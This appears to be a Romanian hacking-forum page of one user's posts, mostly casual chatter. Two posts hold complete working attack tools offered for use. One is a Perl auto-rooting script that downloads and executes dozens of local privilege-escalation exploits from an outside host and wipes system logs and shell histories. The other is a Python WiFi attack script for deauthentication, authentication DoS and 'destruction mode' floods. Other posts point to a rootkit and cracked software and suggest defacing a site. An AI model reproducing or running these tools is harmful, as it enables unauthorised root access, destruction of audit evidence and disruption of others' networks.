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Everything posted by gogusan

  1. ) hai ca e tare asta, dar nu l-ai testat si tu in sandbox ma? omg
  2. bun tare! eu nu ti-as fi sters nimic, doar mai adaugam niste "chestii trestii" sunt o gramada de bloguri vulnerabile
  3. exista GYGAN, care iti plateste uploadul. dai pe guagal
  4. ahahhahahahahah man, ti-as da 129312 de reputatie daca asa avea. am ras copios, you've made my day! )))))))))))))))))))
  5. danke! chiar cautam asa ceva:)
  6. si mai face si cate o m03 din cand in cand @ topic. merge si cu gmail (cel putin la mine a mers)
  7. deci omul scrie parola in primul sau post si voi sariti de kur in sus ca nu va merge parola. Doamne'! @Oust ms, am un prieten care a folosit metoda acum ceva timp, dar nu functioneaza chiar 100%, dar te propulseaza semnificativ la goagal
  8. pai sunt foarte vechi treburile astea. unii fac pt siteurile de shorturl gen adfly si altii fac pt surveys (gen cpalead) Location www punct iAvatar punct ro Created By iAvatar, Aaron Vlad ar merita un deface LE: 36,052 Attending iti dai seama ca a avut 36,052 afisari pe shorturlul ala plus LIKEs btw: la 10k Likes pe facebook page, iti poti schimba pagina de start default.
  9. salut. eu am facut un tutorial(in general tutorialele sunt pentru cei care nu stiu sau sunt incepatori). n-am zis ca nimeni de aici nu stie sa faca meritam un +rep ca mi-am dat silinta eu am o versiune dar e crackuita nashpa si ma disepera cu erorile. cauta pe google: "Red.Gate.Reflector.VSPro.v7.0.1.1-Lz0.rar" daca are cineva un reflector stabil >7.x sa dea un share pls . merci
  10. Download: Ncom Libcall Hijacking Rootkit ? Packet Storm cititi documentatia. foarte interesant
  11. Viper Auto-Rooting Script ? Packet Storm #!/usr/bin/perl # # ==>> Viper Auto Rooting <<== # # # --------------------------------------------------------------------------------------------------------------------------- # Script : Perl # By : Bl4ck.Viper # From : Azarbycan (Turkish Man)(fardin Allahverdinajhand) # Contact : Bl4ck.Viper@Gmail.Com , Bl4ck.Viper@Hotmail.Com , Bl4ck.Viper@Yahoo.Com # Version : 2.0 # For Black Hat & Real Hackers # --------------------------------------------------------------------------------------------------------------------------- # --------------------------------------------------------------------------------------------------------------------------- # For All Version Of Linux , SunOS , MacOS X , FreeBSD # --------------------------------------------------------------------------------------------------------------------------- # print "\t\t\tViper Auto Rooting\n"; print "\t\t\tVersion : 2.0\n"; print "\n"; print "\n\n"; print "\t\t------------------------------------\n"; print "\t\t\tCoded By Bl4ck.Viper\n"; print "\t\t------------------------------------\n"; print "\t\t For See Commands type [help] \n"; print "\n"; command:; print 'Viper@Localr00t#:'; $command = <STDIN>; if ($command =~ /help/){ goto help } if ($command =~ /sysline/){ goto sysline } if ($command =~ /varline/){ goto varline } if ($command =~ /gccinfo/){ goto gccinfo } if ($command =~ /sysinfo/){ goto sysinfo } if ($command =~ /logc/){ goto logc } if ($command =~ /config/){ goto config } if ($command =~ /logs/){ goto logs } if ($command =~ /sysproc/){ goto sysproc } if ($command =~ /all/){ goto all } if ($command =~ /2.2.x/){ goto local2 } if ($command =~ /2.4.x/){ goto local4 } if ($command =~ /2.6.x/){ goto local6 } if ($command =~ /freebsd-x/){ goto freebsd } if ($command =~ /mac-os-x/){ goto mac } if ($command =~ /red-x/){ goto red } if ($command =~ /sunos-x/){ goto sun } else{ print "Unknow Command !\n"; goto command }; help:; print "\t--------------------------------------------------------\n"; print "\t\tsysline\t\t[Go To System Command Line]\n"; print "\t\tvarline\t\t[Go To var.pl Command Line]\n"; print "\t\tsysinfo\t\t[Show System Information]\n"; print "\t\tsysproc\t\t[Show Running Proccess's]\n"; print "\t\tconfig\t\t[Show Config File]\n"; print "\t\tlogs\t\t[Show System Log File]\n"; print "\t\tall\t\t[Show All Localroots In Database]\n"; print "\t\tgccinfo\t\t[Check For gcc Installed Or Not Installed]\n"; print "\t\tlogc\t\t[Clear Server Log]\n"; print "\t\t2.2.x\t\t[Localroots of 2.2.x]\n"; print "\t\t2.4.x\t\t[Localroots of 2.4.x]\n"; print "\t\t2.6.x\t\t[Localroots of 2.6.x]\n"; print "\t\tfreebsd-x\t[Localroots of FreeBSD]\n"; print "\t\tmac-os-x\t[Localroots of MacOS X]\n"; print "\t\tred-x\t\t[Localroots of RedHat]\n"; print "\t\tsunos-x\t\t[Localroots of Sun Solaris OS]\n"; print "\t--------------------------------------------------------\n"; print "\n"; goto command; sysline:; print "system:"; $systemm = <>; if ($systemm =~ /varline/){ goto varline } system("$systemm"); goto sysline; varline:; goto command; all:; print q{ 2.2.27 2.2.x 2.4 2.6 2.4.17 2.4.18 2.4.19 2.4.20 2.4.21 2.4.22 2.4.22-10 2.4.23 2.4.24 2.4.25 2.4.26 2.4.29 2.4.x 2.6.2 2.6.4 2.6.5 2.6.7 2.6.8 2.6.9 2.6.9-22.sh 2.6.9-34 2.6.9-55 2.6.10 2.6.11 2.6.12 2.6.13 2.6.13-17-2 2.6.13-17-3 2.6.14 2.6.15 2.6.16 2.6.17 2.6.x FreeBSD 4.4 - 4.6 FreeBSD 4.8 FreeBSD 5.3 Mac OS X red-7.3 red-8.0 red-hat8.0-2 redhat 7.0 redhat 7.1 SunOS 5.7 SunOS 5.8 SunOS 5.9 SunOS 5.10 }; print "\n"; goto command; local2:; print "\t\tWelcome To 2.2.x Section\n"; system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/elfcd1.c;gcc elfcd1.c -o elfcd1;chmod 777 elfcd1;./elfcd1"); system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/mremap_pte;chmod 777 mremap_pte;./mremap_pte"); system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/uselib24;chmod 777 uselib24;./uselib24"); system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/ptrace24;chmod 777 ptrace24;./ptrace24"); system ("id"); local4:; system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/pwned.c;gcc pwned.c -o pwned;chmod 777 pwned;./pwned"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/kmod;chmod 777 kmod;./kmod"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/newlocal;chmod 777 newlocal;./newlocal"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/uselib24;chmod 777 uselib24;./uselib24"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/brk;chmod 777 brk;./brk"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/brk2;chmod 777 brk2;./brk2"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/ptrace;chmod 777 ptrace;./ptrace"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/ptrace-kmod;chmod 777 ptrace-kmod;./ptrace-kmod"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/2.4.22.c;gcc 2.4.22.c -o 2.4.22;chmod 777 2.4.22;./2.4.22"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/loginx;chmod 777 loginx;./loginx"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/hatorihanzo.c;gcc hatorihanzo.c -o hatorihanzo;chmod 777 hatorihanzo;./hatorihanzo"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/mremap_pte;chmod 777 mremap_pte;./mremap_pte"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/Linux-kernel-mremap.c;gcc Linux-kernel-mremap.c -o Linux-kernel-mremap;chmod 777 Linux-kernel-mremap;./Linux-kernel-mremap"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/uselib24;chmod 777 uselib24;./uselib24"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/expand_stack.c;gcc expand_stack.c -o expand_stack;chmod 777 expand_stack;./expand_stack"); system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/elflbl;chmod 777 elflbl;./elflbl"); system ("id"); local6:; system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/h00lyshit;chmod 777 h00lyshit;./h00lyshit"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/krad;chmod 777 krad;./krad"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/myptrace;chmod 777 myptrace;./myptrace"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/hudo.c;gcc hudo.c -o hudo;chmod 777 hudo;./hudo"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/05;chmod 777 05;./05"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/krad2;chmod 777 krad2;./krad2"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/ong_bak.c;gcc ong_bak.c -o ong_bak;chmod 777 ong_bak;./ong_bak"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.9-55-2007-prv8;chmod 777 2.6.9-55-2007-prv8;./2.6.9-55-2007-prv8"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/04;chmod 777 04;./04"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/06;chmod 777 06;./06"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/r00t;chmod 777 r00t;./r00t"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/uselib24.c;gcc uselib24.c -o uselib24;chmod 777 uselib24;./uselib24"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.11.c;gcc 2.6.11.c -o 2.6.11;chmod 777 2.6.11;./2.6.11"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/k-rad.c;gcc k-rad.c -o k-rad;chmod 777 k-rad;./k-rad"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/k-rad3;chmod 777 k-rad3;./k-rad3"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/pwned;chmod 777 pwned;./pwned"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/binfmt_elf.c;gcc binfmt_elf.c -o binfmt_elf;chmod 777 binfmt_elf;./binfmt_elf"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/elfcd2.c;gcc elfcd2.c -o elfcd2;chmod 777 elfcd2;./elfcd2"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct1;chmod 777 prct1;./prct1"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct2;chmod 777 prct2;./prct2"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct3;chmod 777 prct3;./prct3"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct4;chmod 777 prct4;./prct4"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct6;chmod 777 prct6;./prct6"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/raptor;chmod 777 raptor;./raptor"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.17;chmod 777 2.6.17;./2.6.17"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct5.sh;chmod 777 prct5.sh;./prct5.sh"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/root;chmod 777 root;./root"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/cw7.3;chmod 777 cw7.3;./cw7.3"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/x;chmod 777 x;./x"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/x2;chmod 777 x2;./x2"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/exp.sh;chmod 777 exp.sh;./exp.sh"); system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/root2;chmod 777 root2;./root2"); system ("id"); freebsd:; system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/bsd;chmod 777 bsd;./bsd"); system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/48local;chmod 777 48local;./48local"); system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/exploit;chmod 777 exploit;./exploit"); system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/freedbs5.3;chmod 777 freedbs5.3;./freedbs5.3"); system ("id"); mac:; system ("cd /tmp;mkdir mac;chmod 777 mac;cd mac;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/mac/macosX;chmod 777 macosX;./macosX"); system ("id"); red:; system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/afd-expl.c;gcc afd-expl.c -o afd-expl;chmod 777 afd-expl;./afd-expl"); system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/alsaplayer-suid.c;gcc alsaplayer-suid.c -o alsaplayer-suid;chmod 777 alsaplayer-suid;./alsaplayer-suid"); system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/nslconf.c;gcc nslconf.c -o nslconf;chmod 777 nslconf;./nslconf"); system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/ohMy-another-efs;chmod 777 ohMy-another-efs;./ohMy-another-efs"); system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/0x82-Remote.tannehehe.xpl.c;gcc 0x82-Remote.tannehehe.xpl.c -o 0x82-Remote.tannehehe.xpl;chmod 777 0x82-Remote.tannehehe.xpl;./0x82-Remote.tannehehe.xpl"); system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/efs_local;chmod 777 efs_local;./efs_local"); system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/ifenslave;chmod 777 ifenslave;./ifenslave"); system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/crontab.c;gcc crontab.c -o crontab;chmod 777 crontab;./crontab"); system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/epcs2.c;gcc epcs2.c -o epcs2;chmod 777 epcs2;./epcs2"); system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/rh71sm8.c;gcc rh71sm8.c -o rh71sm8;chmod 777 rh71sm8;./rh71sm8"); system ("id"); sun:; system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/solaris27;chmod 777 solaris27;./solaris27"); system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/final;chmod 777 final;./final"); system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/sunos59;chmod 777 sunos59;./sunos59"); system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/sunos510.c;gcc sunos510.c -o sunos510;chmod 777 sunos510;./sunos510"); system ("id"); sysinfo:; system ("dmesg"); print "\n\n"; system ("set"); print "\n\n"; system ("uname -a"); print "\n\n"; system ("uname -r"); print "\n\n"; system ("ifconfig"); print "\n\n"; goto command; gccinfo:; system ("locate gcc"); print "\n\n"; goto command; sysproc:; system ("ps aux"); print "\n\n"; goto command; logc:; system ("rm -rf /tmp/logs"); system ("rm -rf $HISTFILE"); system ("rm -rf /root/.ksh_history"); system ("rm -rf /root/.bash_history"); system ("rm -rf /root/.bash_logout"); system ("rm -rf /usr/local/apache/logs"); sleep(2); system ("rm -rf /usr/local/apache/log"); system ("rm -rf /var/apache/logs"); system ("rm -rf /var/apache/log"); system ("rm -rf /var/run/utmp"); system ("rm -rf /var/logs"); system ("rm -rf /var/log"); sleep(2); system ("rm -rf /var/adm"); system ("rm -rf /etc/wtmp"); system ("rm -rf /etc/utmp"); print "\n"; print "Done!"; goto command; logs:; print "\n"; system ("cat /etc/syslog.conf"); print "\n\n"; goto command; config:; print "\n"; system ("cat ./../mainfile.php"); print "\n\n"; goto command; Va sugerez sa le downloadati pe toate si sa vi le uploadati in alta parte, si sa modificati calea in script. za ceau
  12. oricum nu a interesat pe nimeni, vad. se poate sterge. multumesc
  13. [root@dev ~]# ./ss usage: ./ss <port> [-a <a class> | -b <b class>] [-i <interface] [-s <speed>] speed 10 -> as fast as possible, 1 -> it will take bloody ages (about 50 syns/s) [root@dev ~]#
  14. gogusan

    salut :)

    Name : Cip Age : > 26, <35 Location : Buc. I speak : RO,EN "Regretele zilei de ieri, grijile zilei de maine, NE FURA ZIUA DE AZI!" Have Fun & Make Fun!
  15. deci uitati-va putin cate posturi a facut de cand si-a facut cont. omg
  16. cineva dragutz sa compileze? #!/usr/bin/env python # -*- coding: Utf-8 -*- # # WIRELESS ACCESS POINT FUCKER # Interactive, Multifunction, Destruction Mode Included # Name: AP-Fucker.py # Version: 0.5 # Coded by: MatToufoutu # # Thanks to BackTrack crew, especially ShamanVirtuel and ASPJ # # USAGE: Launch the script as root using "python AP-Fucker.py", follow instructions, enjoy! # Prerequisites: Have mdk3 installed # ### IMPORTS import commands, os from sys import stdout, exit from threading import Thread from time import sleep, ctime try: import psyco psyco.profile() except ImportError: pass global runanim; runanim = True ### MDK3 THREADED ATTACKS CLASS class mdk3(Thread): def __init__(self, attack, attack_options): Thread.__init__(self) self.attack = attack self.iface = attack_options[0] self.essid = attack_options[1] self.bssid = attack_options[2] self.chan = attack_options[3] self.log = "apfucker.log" def bflood(self): out = open(self.log,"a") out.write("\n ----- "+ctime()+" : Launching beacon flood against %s on channel %s -----" % (self.essid, self.chan)) out.close() print("\n Launching beacon flood against %s on channel %s" % (self.essid, self.chan)) sleep(2) os.system("mdk3 "+self.iface+" b -n "+self.essid+" -g -w -m -c "+self.chan+" >> "+self.log) def ados(self): out = open(self.log,"a") out.write("\n ----- "+ctime()+" : Launching Auth DoS against %s -----" % (self.bssid)) out.close() print("\n Launching Auth DoS against %s " % (self.bssid)) sleep(2) os.system("mdk3 "+self.iface+" a -i "+self.bssid+" -m -s 1024 >> "+self.log) def amok(self): out = open(self.log,"a") out.write("\n ----- "+ctime()+" : Launching Deauth Flood 'Amok' Mode on channel %s -----" % (self.chan)) out.close() print("\n Launching Deauth Flood 'Amok' Mode on channel %s" % (self.chan)) sleep(2) os.system("mdk3 "+self.iface+" d -c "+self.chan+" -s 1024 >> "+self.log) def mich(self): out = open(self.log,"a") out.write("\n ----- "+ctime()+" : Launching Michael 'Shutdown' Exploitation against %s on channel %s -----" % (self.bssid, self.chan)) out.close() print("\n Launching Michael 'Shutdown' Exploitation against %s on channel %s" % (self.bssid, self.chan)) sleep(2) os.system("mdk3 "+self.iface+" m -t "+self.bssid+" -j -w 1 -n 1024 -s 1024 >> "+self.log) def wids(self): out = open(self.log,"a") out.write("\n ----- "+ctime()+" : Launching WIDS Confusion against %s on channel %s -----" % (self.essid, self.chan)) out.close() print("\n Launching WIDS Confusion against %s on channel %s" % (self.essid, self.chan)) sleep(2) os.system("mdk3 "+self.iface+" w -e "+self.essid+" -c "+self.chan+" >> "+self.log) def brutmac(self): global runanim out = open(self.log, "a") out.write("\n ----- "+ctime()+" : Launching MAC filter Brute-Forcer against %s -----\n" % (self.bssid)) print("\n Launching MAC filter Brute-Forcer against %s" % (self.bssid)) sleep(2) macfound = commands.getoutput("mdk3 "+self.iface+" f -t "+self.bssid).splitlines()[-2:] runanim = False sleep(1) print; print for line in macfound: print(line) out.write("\n"+line) out.close() print exit(0) def run(self): if self.attack == "B": self.bflood() if self.attack == "A": self.ados() if self.attack == "D": self.amok() if self.attack == "M": self.mich() if self.attack == "W": self.wids() if self.attack == "C": self.brutmac() ### AUXILIARY FUNCTIONS ## CHECK IF IFACE IS IN MONITOR MODE def check_mon(iface): for line in commands.getoutput("iwconfig "+iface).splitlines(): if "Mode:Monitor" in line: return True return False ## CHECK IF BSSID IS VALID def check_mac(ap): if len(ap) != 17 or ap.count(':') != 5: return False macchar="0123456789abcdef:" for c in ap.lower(): if macchar.find(c) == -1: return False return True ## CHECK IF CHANNEL IS VALID def check_chan(iface, chan): if chan.isdigit(): channel=int(chan) if not channel in range(1, int(commands.getoutput("iwlist "+iface+" channel | grep channels | awk '{print $2}'"))+1): return False else: return False return True ## CLEAN EXIT def clean_exit(): print;print print("\nAction aborted by user. Exiting now") for pid in commands.getoutput("ps aux | grep mdk3 | grep -v grep | awk '{print $2}'").splitlines(): os.system("kill -9 "+pid) print("Hope you enjoyed it ;-)") sleep(3) os.system("clear") exit(0) ## DUMMY WAITING MESSAGE (ANIMATED) def waiter(mess): try: stdout.write("\r | "+mess) stdout.flush() sleep(0.15) stdout.write("\r / "+mess) stdout.flush() sleep(0.15) stdout.write("\r-- "+mess) stdout.flush() sleep(0.15) stdout.write("\r \\ "+mess) stdout.flush() sleep(0.15) stdout.write("\r | "+mess) stdout.flush() sleep(0.15) stdout.write("\r / "+mess) stdout.flush() sleep(0.15) stdout.write("\r-- "+mess) stdout.flush() sleep(0.15) stdout.write("\r \\ "+mess) stdout.flush() sleep(0.15) except KeyboardInterrupt: clean_exit() ### MAIN APP attackAvail = ["B", "A", "W", "D", "M", "T", "E", "C"] attack_opt=[] if commands.getoutput("whoami") != "root": print("This script must be run as root !") exit(0) try: os.system("clear") print("\n\t\t########## ACCESS POINT FUCKER ##########\n") print("Choose your Mode:\n\t - (B)eacon flood\n\t - (A)uth DoS\n\t - (W)ids confusion\n\t - (D)isassociation 'AmoK Mode'\n\t - (M)ichael shutdown exploitation\n\t - MA(C) Filter Brute-Forcer\n\t - Des(T)ruction mode (USE WITH CAUTION)\n") ## GET MODE while 1: mode = raw_input("\n>>> ") if mode.upper() not in attackAvail: print(" '%s' is not a valid mode !" % mode) else: break ## GET INTERFACE while 1: iface = raw_input("\nMonitor interface to use: ") if check_mon(iface): attack_opt.append(iface) break else: print("%s is not a Monitor interface, try again or hit Ctrl+C to quit" % iface) ## GET ESSID if mode.upper() == "B" or mode.upper() == "W" or mode.upper() == "T": attack_opt.append("\""+raw_input("\nTarget ESSID: ")+"\"") else: attack_opt.append(None) ## GET BSSID if mode.upper() == "A" or mode.upper() == "M" or mode.upper() == "T" or mode.upper() == "C": while 1: bssid = raw_input("\nTarget BSSID: ") if check_mac(bssid): attack_opt.append(bssid) break else: print("Invalid BSSID, try again or hit Ctrl+C to quit") else: attack_opt.append(None) ## GET CHANNEL if mode.upper() != "C": while 1: channel = raw_input("\nTarget channel: ") if check_chan(iface, channel): attack_opt.append(channel) break else: print("Channel can only be 1 to 14, try again or hit Ctrl+C to quit") else: attack_opt.append(None) ## LAUNCH SELECTED ATTACK if os.path.exists("apfucker.log"): os.unlink("apfucker.log") if mode.upper() != "T": os.system('clear') mdk3(mode.upper(), attack_opt).start() sleep(1) print; print; print while runanim: waiter(" ATTACK IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...") else: os.system('clear') print("\n\t/!\\/!\\/!\\ WARNING /!\\/!\\/!\\\n") print(" You've choosen DESTRUCTION MODE") print(" Using this mode may harm your WiFi card, use it at your own risks.") validate = raw_input(" Do you wish to continue? (y/N): ") if validate.upper() != "Y": print(" Ok, exiting now") exit(0) else: out=open("apfucker.log","a") out.write("\n ----- "+ctime()+" : Launching Destruction Combo. Target is AP %s|%s on channel %s -----" % (attack_opt[1], attack_opt[2], attack_opt[3])) out.close() print("\n Launching Destruction Combo\n Target is AP %s|%s on channel %s" % (attack_opt[1], attack_opt[2], attack_opt[3])) print(" Please be kind with your neighbours xD") mdk3("B", attack_opt).start() mdk3("A", attack_opt).start() mdk3("D", attack_opt).start() mdk3("M", attack_opt).start() ##wids may raise a segfault(internal mdk3 problem when multiple attacks apparently) #mdk3("W",attack_opt).start() sleep(1) print; print; print while runanim: waiter(" DESTRUCTION COMBO IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...") except KeyboardInterrupt: clean_exit()
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